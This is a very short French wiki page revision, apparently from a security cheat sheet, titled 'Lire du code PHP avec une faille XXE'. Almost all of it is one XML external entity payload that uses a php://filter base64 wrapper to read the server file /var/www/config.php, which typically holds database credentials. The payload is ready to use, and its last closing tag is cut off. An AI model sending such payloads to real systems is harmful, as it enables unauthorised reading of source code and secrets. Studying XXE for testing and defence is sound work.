1.9 Failles XXE
Révision datée du 21 octobre 2014 à 18:32 par Futex (discussion | contributions)
Lire du code PHP avec une faille XXE
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.php" > ]> <results> <result>&harmless;</result> </results